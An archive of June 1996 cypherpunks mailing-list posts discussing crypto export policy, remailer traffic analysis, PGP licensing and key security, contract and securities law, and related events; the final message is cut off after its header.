Message-ID: <19960604152234.175.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


 > >----- Forwarded Cyberia-L message (DAVID POST <postd@EROLS.COM>) -----< 

 > Someone else pointed to a recent story in the Economist, which
 > listed the leading encryption software/services companies
 > worldwide, each of which is Israeli.
 > 
 > Bidzos made the claim, and many others echoed, that the export
 > controls are in the process of doing nothing more than ceding a
 > potentially lucrative market to others, a market in which the US
 > might otherwise be expected to be the dominant player.  It may
 > even, in the eyes of some, be too late to undo this damage.

Not only that, but where are the cryptographers of the future going to
come from for the NSA to recruit?  Israel??  Oh right, foreign
nationals privy to our own highest secrets, give me a break.  Do they
intend to train them themselves?  If so, that's identical in principle
to universities granting tenure to their own graduates.  You get
inbred that way, so universities don't do that.

The principle behind crypto secrecy presumes that other people don't
have the secret.  Once they do, you only hurt yourself by trying to
keep a double-edged sword in the closet.  The NSA believes that they
can and should discard any amount of benefits of crypto in exchange
for avoiding any harm of crypto.  They are wrong.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 5 Jun 1996 13:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: cycle market
Message-ID: <9606042028.AA08650@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I was trying to think what I would use a cycle market for.  The
> only thing that I wait for more than a minute on currently is
> compiling.

Just try doing some large graphical operations - especially 
raytracing/rendering type stuff, or heavy graphical analysis
of a set of image data.  Fractal drawing falls in this realm as well.
Then try doing some ASIC simulation, or finite element analysis.

In this group it also goes without saying that there are also things 
like factoring large numbers that a cycle market would be ideal for.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 5 Jun 1996 13:02:34 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <199606020659.XAA25720@toad.com>
Message-ID: <199606042040.QAA15977@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
>>I don't think multiple remailers at the same site help anything.
>
>Assume Alice, Bob, and Carol are on abc.com and Xenu, Yak, and Zut
>are on xyz.com.  Remailing between Alice, Bob, and Carol doesn't
>make appear to make much difference, but it does reduce the damage
>if one of the remailer's keys is compromised.  On the other hand,
>mail from Alice -> Xenu -> Bob -> Yak -> Carol -> Zut adds traffic
>to the system, and makes traffic analysis more difficult,
>even if the Bad Guys are watching site abc.com and have stolen
>Alice, Bob, and Carol's keys.

Wait a minute.  More traffic should make analysis easier, since traffic
analysis is mostly statistical work on the source and destination (not
necessarily "from" and "to").  A bigger sample makes more reliable
results.

For traffic analysis, I don't know *who* sent the message (it was,
after all, anonymized), but I do know a site which transmitted it and
one which received it, the time it was transmitted, and maybe its
size.  Multiply this times a whole bunch of messages, and I can infer
information about "common interests" between those sources and
destinations.

The delays and mixing done by remailers make it harder by
disassociating the true sender from the true receiver.  If a remailer
were to ignore this step, the analyst can deduce from the two data
points

    "message a, source A, destination RemailerX, time t, size s"
    "message b, source RemailerX, destination B, time t+0.001s, size s"

that there's some connection between A and B.  The more such evidence,
the stronger the connection.  If the remailer does a good job with
the delays and shuffling, then it becomes difficult for the analyst
to match message a with message b, leaving him with what he already
knew (that A and RemailerX have a common interest, as to B and RemailerX,
but the interests may be wholly unrelated).

Multiple remailers on the same machine increases the resolution of
the address information, at best, improving the analysts ability to
make connections.  The same traffic load going to a single remailer
at the site makes the analyst's job harder.

>The other threat it helps with is that if XYZ.COM gets complaints
>about that evil user Zut, she can kick her off (Bad Zut!)
>and still leave Xenu and Yak alone; if the remailer service
>were provided by the machine owner herself she might be directly liable.

Hmm.  Nothing really stops the machine owner from creating a personal
anonymous account to run the remailer.  When someone complains, shut it
down and create a new one.  There isn't yet a law which requires that
the owner be able to identify the user.  This affords the same
protection that multiple users does.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Wed, 5 Jun 1996 13:04:45 +0800
To: brock@well.com
Subject: Re: CWD: "Jacking in from the "One that Got Away" Port (fwd)
Message-ID: <2.2.32.19960604194607.0031e8dc@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain



>(By Brock Meeks / brock@well.com / Archived at http://www.cyberwerks.com/)
>
>
> CyberWire Dispatch // Copyright (c) 1996 //
>
> Jacking in from the "One that Got Away" Port:
>
> Washington, DC -- President Clinton call your spooks, get FBI Director
> Louis Freeh on the phone.   Tell them to order in pizza.  Bill, it's
> going to be a long night.   All your plans to hold the U.S. crypto
> market hostage have just been fucked... and you didn't even get kissed.
>
> A virtual tactical nuke was hurled into the arcane subculture of
> encryption technology Monday when RSA President Jim Bizdos revealed
> that his company's Japanese subsidiary had developed a monster chipset
> capable of scrambling voice and data real time with a so-called "key
> length" of up to 1024 bits.

Brock,

        you have probably heard by now -- this is wrong.

        The chip set was developed by a subsidiary of NTT called NEL.
That's much worse, of course, than if it had been an RSA subsidiary.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc.                              http://www.cybercash.com/    |
|207 Grindall Street           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Baltimore MD 21230-4103       T:(410) 727-4288     F:(410)727-4293        |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 5 Jun 1996 04:10:41 +0800
To: cypherpunks@toad.com
Subject: cycle market
Message-ID: <199606041351.PAA21165@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I was trying to think what I would use a cycle market for.  The
only thing that I wait for more than a minute on currently is
compiling.  It might be quicker to ship my source code to a
remote compilation service with big pipes and big engines.
Considering that I've got a Pentium 120 on my desktop, though,
those would have be pretty big engines to make up for the time
lost in transmission of source and compiler output (both
compiler messages and object files.)


Just musing out loud.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMbQ/d0jbHy8sKZitAQHRFgL/Ydkbb4ieFryq1ZRwAVPR0/gksKdVMJ88
rWXGmqpHh810mi1vqgEjWL3XSJL1ogoN6GXuvpZQufvN0ldShOr+fDiodYX6g53K
gK+6Z5WTUzTS6Wn1I/IGuSQ86Om4+JOg
=MQ0q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 5 Jun 1996 12:30:23 +0800
Subject: No Subject
Message-ID: <199606042003.NAA24707@toad.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 5 Jun 1996 13:18:01 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Electronic Signature Act Of 1996
In-Reply-To: <2.2.32.19960604165840.00725e30@popmail.crl.com>
Message-ID: <Pine.SUN.3.91.960604155003.8159A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                        SANDY SANDFORT
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> C'punks,
> 
> At 11:11 AM 6/4/96 -0400, Perry E. Metzger wrote:
> 
> >...I get the impression that under the common law, an ink 
> >signature is merely a demonstration that a party assented 
> >to a contract, and except for certain contracts (which 
> >usually require witnesses etc.) there is no requirement in 
> >the law that a contract even be on paper...
> 
> The "Statute of Frauds" lists the exceptions and they cover
> most important contracts.  I seem to recall that contracts
> over a given amount or for interests in real property for 
> periods of a year or more are covered.  I'm sure someone 
> with current access to legal research resources will post
> a better explanation.

Section 2-201 of the Uniform Commercial Code (UCC) provides:

(1) Except as otherwise provided in this section a contract for the sale of 
goods for the price of $500 or more is not enforceable by way of action 
or defense unless there is some writing sufficent to indicate that a 
contract for sale has been made between the parties and signed by the 
party aginst whom enforcement is sought or by his authorized agent or 
broker.

[...]

(3) A contract which does not satisify the requirements of subsection (1) 
but which is valid in other respects is enforceable:

(a) If the goods are to be specially manufactured for the buyer and are 
not suitable for sale to others in the ordinary course of the seller's 
business and the seller, before notice of repudiation is received and 
under circumstances which reasonably indicate that the goods are for the 
buyer, has made either a substantial beginning of their manufacture or 
commitments for their procurement; or

(b) If the party against whom enforcement is sought admits in his 
pleading, testomony or otherwise in court that a contract for sale was 
made, but the contract is not enforceable under this provision beyond a 
qualtity of goods admitted; or

(c) With respect to goods for which payment has been made and accepted or 
which have been received and accepted (See section 2-606).

*end

Note:  This only applies to the sale of GOODS.  Not all states follow the 
UCC exactly.  Note also that the term "good" is a term of art which has a 
complex and non-intuative meaning.

Is it a sale of goods?  (If yes, has the forum adopted the UCC?  If no, 
then is there a state Statute of Frauds to look to?)
If it's not a sale of goods, well, then you have piles of contracts 
reading to do.

In short:  While it is safest to provide for contracts larger then $500 
in writing, there are many ways that contracts can be formed for millions 
of dollars without a drop of ink or scrap of paper.  (Promisory Estoppel 
comes to mind).


>  S a n d y

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: poh@iss.nus.sg (Peter Oh Siu Wai)
Date: Tue, 4 Jun 1996 19:49:58 +0800
To: CYPHERPUNKS@toad.com
Subject: Greetings from Star+Globe
Message-ID: <199606040800.QAA24778@iss.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


 Dear Sir/ Madam,

 Greetings from Star+Globe Technologies!

 Thank you for accessing & using our WinMASS. It is indeed our pleasure
 to bring you the multilingual world at your fingertips. To pursue our
 objective of delivering the best and most cost effective solution for all
 your multilingual computing needs, we appreciate your support and
 encouragement.

 May we take this opportunity to seek your views and suggestions on
 WinMASS, based on the Cyber Launch of May 15th, 1996 wherein you have
 registered.

  1.Did you have any problems while downloading WinMASS? Please specify.
  2.Have you tried and explored WinMASS?
  3.Is WinMASS informative and complete? did you find anything missing?
  4.With what application did you use WinMASS? were you satisfied?
  5.Have you used / using any other Multilingual Software?
  6.What is your working platform for Hardware and Software?
  7.What features do you like most about WinMASS?
  8.What additional features would you like to have?
  9.Do you have any specific querries that you would like us to answer?
 10.Any other valuable feedback is welcome.

 We want to improve our service to you. Your support and cooperation is
 highly desired and will be helpful to do our best.

 Thank you and look forward to receiving your valuable information at
 any of the following e-mail address:

         info@starglobe.com.sg
         sales@starglobe.com.sg
         venki@starglobe.com.sg

 Best Regards,

 Venki Char





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@ecotone.toad.com>
Date: Wed, 5 Jun 1996 18:49:49 +0800
To: cypherpunks@toad.com
Subject: LEGISLATIVE:  SHORT NOTICE! of a SF SCTB/NRC crypto policy hearing
Message-ID: <199606042329.QAA06008@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Start of forwarded message -------

Date: Fri, 31 May 96 18:12:00 EST
From: "CRYPTO" <crypto@nas.edu>
To: crypto@nas.edu
Subject: Public briefing on the NRC Crypto Policy report

     Please post widely.

     The Computer Science and Telecommunications Board (CSTB) of the
     National Research Council (NRC) has completed a congressionally
     mandated study of national cryptography policy.  The final report,
     Cryptography's Role in Securing the Information Society, was released
     to the public on May 30, 1996.

     Some members of the committee will conduct a public briefing on the
     report in
     Menlo Park, California at SRI International.  The briefing will be
     held in the Auditorium of the International Building from 10 to 11 am
     on  Wednesday, June.5.  The address is 333 Ravenswood Avenue, Menlo
     Park, California, 94025.  For more information about the briefing at
     SRI, contact Alice Galloway at 415-859-2711
     (alice_galloway@qm.sri.com).

     If you have suggestions about other places that the committee should
     offer a public briefing, please let me know (crypto@nas.edu or
     202-334-2605).

     A summary of the report ("Overview and Recommendations") is available
     through http://www2.nas.edu/cstbweb; the full publication will be made
     available when final printed copies of the book are available
     (probably around the beginning of August).

     If you wish to be kept informed of various other public activities
     regarding dissemination of this report, you can sign up for an e-mail
     list by visiting the web page
     http://www2.nas.edu/cstbweb/notifyme.html.

     I apologize to you for the short notice on this invitation, but hope
     that you will be able to attend.

                       Herb Lin
                       Senior Staff Officer
                       Study Director
                       CSTB/NRC Study of National Cryptography Policy
                       crypto@nas.edu

------- End of forwarded message -------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Wed, 5 Jun 1996 13:28:52 +0800
To: Dan Haskovec <dhaskove@ucsd.edu>
Subject: Re: Class III InfoWar: TST Article
In-Reply-To: <Pine.SUN.3.91.960604122601.20280A-100000@sdcc10.ucsd.edu>
Message-ID: <Pine.SOL.3.91.960604163240.338A-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain


If it's a myth, it's quite an elaborate one. On Saturday night I was 
interviewed by the BBC about this.  The producer read the entire article 
to me, telling me in was on the front page of the Times. (My comments 
were not about the specific story, but the underlying security issues.) I 
don't think he was making it up.

Maybe the London Times isn't on Nexus.

Steven

On Tue, 4 Jun 1996, Dan Haskovec wrote:

> Here's the reply I got from a friend that I forwarded it to....
> 
> 
>      and the verdict is... NetMYTH!  I checked the cite in the article on 
>      cyberterrorism... no such article ran on 6/2/96 in the Times 
>      (London)... nor, in fact, in any newspaper available on Nexis... 
>      just thought I would let you know...
> 
>      
> 
> On Sun, 2 Jun 1996, John Young wrote:
> 
> > This is the article Winn Schwartau cited to last night: 
> >  
> > ---------- 
> >  
> >  
> >    The Sunday Times (London), June 2, 1996, pp. 1, 24. 
> >  
> >  
> >    City surrenders to L400m gangs [Insight column] 
> >  
> >  
> >    City of London financial institutions have paid huge sums 
> >    to international gangs of sophisticated "cyber terrorists" 
> >    who have amassed up to L400m worldwide by threatening to 
> >    wipe out computer systems. 
> [...]
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TT <apache@quux.apana.org.au>
Date: Tue, 4 Jun 1996 19:44:13 +0800
To: cypherpunks@toad.com
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
In-Reply-To: <Pine.LNX.3.91.960604005849.2051A-100000@quux.apana.org.au>
Message-ID: <Pine.LNX.3.91.960604163537.5315B-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996, TT wrote:
 
> I think it is actually easy to use, although granted others may not; but 
> that people tend not to use it as a matter of course (and it is my belief 
> this is a desireable thing) due too the time taken to manually sign mail 
> or sign and encrypt.

Correction: should read...it is my belief this is _not_ a desireable thing..

-- 
   .////.   .//    Charles Senescall            apache@quux.apana.org.au
 o:::::::::///                                         apache@gil.com.au
>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
   '\\\\\'   \\    http://quux.apana.org.au/~apache/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 5 Jun 1996 15:12:03 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: On the Hill: Child Porn "Morphing"
Message-ID: <Pine.SUN.3.91.960604163805.11159A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Hearings on the hill over the child pornographer horseman:

"Morphing" seems to be the latest buzzword for putting childrens faces on 
the bodies of adult models in sexually explicit poses and seems to have 
attracted enough attention to warrant congressional attention.

Interesting that the media is playing this up as a "net" deal.  (As if 
somehow it were impossible to do without the all powerful and evil internet.

I'd like to see exactly how they word the proposed prohibitons.  What 
constitutes "child" when the face painted on is pure artistry?  Will we 
see a simple and strict prohibition over modifiying sexually explicit 
pictures to make them appear to be of younger models (whatever their 
apparent age may be)?  Will we see a subjective test as to what is "child 
looking" enough?

Silliness.  All silliness.

Prediction:  Some manner of law will be on the books (Or perhaps passed, but 
unsigned) before the election attempting to prohibit some form of this 
activity.  Certainly Clinton is not going to veto such a bill before the 
election, which is doubtlessly when the right is going to try to push it 
through.  (Can they streamline it enough to get a vote in time?)

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 5 Jun 1996 16:01:08 +0800
To: cypherpunks@toad.com
Subject: Re:FOR WHOM THE BELL TOLLS
Message-ID: <v02140b02adda8b4b956f@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Sandy writes:
>
> In a recent exchange, Carl Ellison wrote:
>
> >After the meeting ended it hit me what the problem is and I
> >mentioned it to PRZ.  We're complaining that the Executive
> >has gone rogue -- is disobeying the will of the people.
> >PRZ likened it to Nixon's war in Cambodia.
>
> To which Jim Bell replied:

Hmmm... time to fix my Jim Bell filter, this message seemed to have
gotten around it.

>
> >I have a solution to that problem.

Yes, I am sure Jim does.  Expect a few Treasury agents to visit
him in the near future regarding threats against the president,
they seem to be a little overzealous about this statute...
(a felony I believe...)

> My question for member of this list is:  When Bell finally
> goes too far and they arrest or shoot him, how can we best
> capitalize on his martyrdom?  Or in a more negative light,
> what damage control will we need to do in that case?

A movement is not complete until it has a few nuts who claim
you are not going far enough, only then does it have a chance
of being incorporated into the mainstream.  I would suggest
just ignoring him, and once he is arrested claim he was a plant
by the IRS :)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 5 Jun 1996 15:10:35 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <mmaZoD50w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960604164615.11159B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996, Dr.Dimitri Vulis KOTM wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> > I direct you to Dirks v. Securities and Exchange Commission, 463 U.S. 646
> > (1983).
> 
> rev'g 681 F.2d 824 (D.C.Cir.1982), SEC. Rel #34-17480 (Jan 22, 1981).

[...]

> his tippees. The decision was upheld by the Court of Appeals but _reversed
> by the Supreme Court on the grounds that the insider did not breach his
> fiduciary duty by disclosure of the information because there was no benefit
> to the insider, and thus Dirks did not breach any duty."

I'm not sure where you got this quote.  Probably a commentator who knows 
jack about securities regulation.  They reversed because the SECs 
conclusion was expansive even with respect to Chiarella, which it 
implied it was following:  "Where 'tippees' - regardless of their 
motiviation or occupation- come into possession of material 'information 
that they know is confidential and know or should know came from a 
corporate insider,' they must either publically disclose that information 
or refrain from trading"  21 SEC Docket 1401, 1407 (1981).

> I.e., Dirks got
> away with it, after spending lots of $$$ on shysters.

I'm not sure I agree with your read of the facts here at all.

You failed to mention that Dirks called the Wall Street Journal with his
findings in an effort to expose the massive frauds at three times and was 
ignored each time.  (William Blundell was the Journal reporter).

Dirks began to tell everyone under the sun about his own first hand 
investigations (he visited Equity Funding in LA and talked to officers 
and employees) only after he was repeatedly ignored by the Journal and 
other publications (which refused to believe that Equity was twisted as a 
pretzel).  Neither Dirks nor his firm ever held interests in Equity Funding.

As word spread of the fraud, Equity funding lost half its value in two 
weeks.  California impounded Equity's records and revealed the fraud 
officially.  Finally, the SEC (who Dirks had also yelled at and been 
ignored by) filed a complaint (3 weeks later) and the Journal Published a 
story (front page April 2, 1973).

It was then, and amid criticism of the SEC, that a complaint was filed 
against Dirks and the SEC found Dirks had aided and abetted violations of 
section 17(a) of the Securities Act of 1933, rule 10b and 10b-5 among 
others.  After a massive stink, the SEC backed off and stated that Dirks 
"played an important role in bringing [Equity Funding's] massive fraud to 
light," 21 SEC Docket at 1412.  The SEC elected to drop charges, and only 
censured Dirks.

Dirks wasn't buying this bill of goods (it seemed to have the tendency to 
repeatedly destroy his career) and instead and appealed to the Court of 
Appeals for the District of Columbia Circuit to clear his good name.  
(No fines or restrictions were imposed on Dirks, they merely held him out 
to be a crook in public).  The District Court entered against Dirks and he 
appealed to the Supreme Court which reversed.

Easy to demonize the defendant when you don't have all the facts.

> IANAL,

Apology accepted.

> but I see a trend to let insiders get away with trading on material
> non-public information in Chiarella v. U.S. (455 US 222 (1980)) followed by
> Dirks.

An odd analysis considering both Chiarella and Dirks simply refine the 
defintion of insider instead of allowing the SEC to designate it.

> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 5 Jun 1996 17:06:08 +0800
To: cypherpunks@toad.com
Subject: [SF Bay Area] Steganography -- Peter Wayner Ph.D.
Message-ID: <v01540b00adda94e26f40@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Seen on the net:



AN EVENT AT COMPUTER LITERACY BOOKSHOPS

----------------------------------------------------------------------
CAN SECRETS BE STOPPED?
----------------------------------------------------------------------

A free presentation by Peter Wayner Ph.D.

Date:  Wednesday, June 19, 1996
Time:  6:30 p.m. - 8:00 p.m.

Location: Computer Literacy Bookshops
          2590 North First Street (at Trimble)
          San Jose
          (408) 435-1118

"Steganography" is the art and science of making information
disappear.
If you don't know where it is, you won't even know it exists.  If you
can't find it, you can't censor it.

Dr. Wayner will explore some of the basic ways that people are hiding
information by making it look like something else; such as innocent
ramblings or flames from a newsgroup or background noise in a
digitized
image or sound file.

Dr. Peter Wayner has a Ph.D. in Computer Science.  He has worked at
Xerox PARC and consulted widely on various topics, including computer
security.  His writing has appeared in popular fora like "BYTE"
magazine
and the "New York Times".  He is the author of "Agents Unleashed: A
Public Domain Look at Agent Technology" and "Digital Cash: Commerce on

the Net" and "Disappearing Cryptography".

DID YOU KNOW THAT OUR EVENTS ARE ALSO POSTED ON OUR WEB PAGE?
http://www.clbooks.com/

Stay tuned.  There are more events to come.

July 23
Programming Windows 95 with MFC
by Jeff Prosise

Events at our stores are always free.

Have suggestions about event topics?  Email them to:
eventca_info@clbooks.com

------------------------------------------------------------------------
If you would like to receive e-mail announcements for upcoming store
events, simply write to:

events_ca-request@clbooks.com (for events held at our California
stores)
events_va-request@clbooks.com (for events held at our Virginia store)
------------------------------------------------------------------------

If you have signed up for email announcements but have not received
any,
or wish to be removed from this list, please contact us.  We add names
by request only.

****************************************************
Computer Literacy Bookshops, Inc.

Cherrie C. Chiu
eventinfo_ca@clbooks.com
(408) 435-5015 x116

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 5 Jun 1996 17:38:53 +0800
To: cypherpunks@toad.com
Subject: Richard Stallman on RSA, Zimmermann, crypto
Message-ID: <Pine.3.89.9606041755.A5503-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Richard's comments below are very much worth reading. Also check out the
following URLs for back fight-censorship messages about the RSA/Zimmermann
conflict... 

MIT's Seth Finkelstein on RSA/Zimmermann history:
  http://fight-censorship.dementia.org/dl?num=639

Background on RSA's involvement with recent crypto legislation:
  http://fight-censorship.dementia.org/dl?num=1613
  http://fight-censorship.dementia.org/dl?num=1614
  http://fight-censorship.dementia.org/dl?num=2282

-Declan

---------- Forwarded message ----------
Date: Tue, 4 Jun 1996 20:18:05 -0400
From: Richard Stallman <rms@gnu.ai.mit.edu>
To: declan@well.com
Cc: rms@gnu.ai.mit.edu
Subject: Re: FW: CWD--Crypto Gets A Nuke (fwd)

As an opponent of Clipper--I debated Dorothy Denning on NPR once--I
was glad to read about the new Japanese encryption chip.

But that chip is not the right solution for most people who want to
use encryption.  For example, I'm considering using digital
signatures.  I don't need the high power that requires special
expensive hardware, and I would rather not have to buy it.  What I
would really like is free software, which I can run on an ordinary PC,
to do the job.

Unfortunately, there isn't any.  RSA Inc. made sure of that.

Zimmermann initially intended to release PGP as free software.  But
RSA Inc threatened him with a patent suit, and forced him to change
the distribution terms.  Now PGP in the US uses RSAREF, which is
restricted by a patent license to non-commercial use only.  In other
words, only hobbyists and academics can use it.  There is a commercial
version which is proprietary software, and apparently not many people
want it badly enough to buy it.

The version of PGP used outside the US is free software, but if you
use it within the US, RSA Inc. can sue you.

This is very bad for people who would like to use PGP.  But it is
worse than that.  It affects the political battle too.

PGP had a chance to create a constituency of Americans who demand the
right to use encryption.  If PGP had been allowed for use in business,
not just by hobbyists, we would have far more Americans who care
enough to fight against Clipper--and they would include businesses
which have the funds to influence legislators.  RSA Inc. prevented
this from happening, and did so for no reason except money.

Bidzos and Rivest would like to present themselves as the defenders of
our freedom to use encryption.  And it is true, they would like us to
be able to use encryption, as long as we are required to pay them for
doing so.  But when they had the choice of letting us use encryption
freely or stamping it out, they chose the latter.

I hope you won't portray them as heroes.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Wed, 5 Jun 1996 17:07:01 +0800
To: "Robert A. Hayden" <cypherpunks@toad.com>
Subject: Re: Security of PGP if Secret Key Available?
Message-ID: <1.5.4.16.19960605000219.3a8734e2@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02.36 AM 6/3/96 -0500, Robert A. Hayden wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>About once a week we get some lame-o flame bait posted to 
>alt.security.pgp or this mailing list or somewhere abotu some hole in 
>PGP.  We further say with fairly good reliability that they are bogus, 
>get a light chuckle, and then go back to dealing with the real issues.
>
>However, I got to wondering about the security of PGP assuming somebody 
>trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have 
>it on my personal computer, and somebody gets my secret key, how much 
>less robust has PGP just become, and what are appropriate and reasonable 
>steps to take to protect this weakness?
>
>Thanks
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: PGP Signed with PineSign 2.2
>
>iQCVAwUBMbJ5xTokqlyVGmCFAQGcAgQAvjFdZ+YLdQGxDHcT+GOwP82BSwiTYlaQ
>F9RV8L+radCK/SyeLnEtoodkKVqpcsItIQ/JJ44FOAmnsBLljuWqbhZMl8G8+uCB
>pcpkXpre83CwoM6qDKkCEyqCiMxq857ioCoqb+WRNJYbb++muVBDHADVzGoGOjLg
>cvIMxnnXF3c=
>=tnTb
>-----END PGP SIGNATURE-----

Once your secret key has been compromised, then all that prevents a Bad Guy
from reading your message is your secret key passphrase. (I believe that,
aside from grabbing keystrokes a la TEMPEST, the only way to get this passphrase
is by brute-forcing it, or maybe searching your house for the little piece
of paper that you may have written it on.) I have seen equations which claim
to compute the security of your passphrase and also passphrase generators - 
I don't know if either are any good, though.

- -------------------------------------------------------------------------------
David Rosoff (nihongo o chiisaku dekimasu)                  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
- ---
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." ----- "Ulysses", by Alfred, Lord Tennyson


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbTCmBguzHDTdpL5AQEH4gP/TT3myaSislU3En4xwaB2cWmYhCItlhL/
nhLZM4uxOHv87zsHjYIBrHEHxVHnYOaH/Kd7zSRPRB0ArTDIMP/ZtYISMUNhfSd2
bX+LNdASX9rbiD1Vfcvb/vw6nKlfvdz2WoeeTE/yqSeHjnE7+izEX4Xi/9mHB4s/
N9DDK16kgi4=
=snQo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Wed, 5 Jun 1996 17:31:09 +0800
To: cypherpunks@toad.com
Subject: hacked version of PGP - win95 long filenames
Message-ID: <1.5.4.16.19960605000224.3a874cf2@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

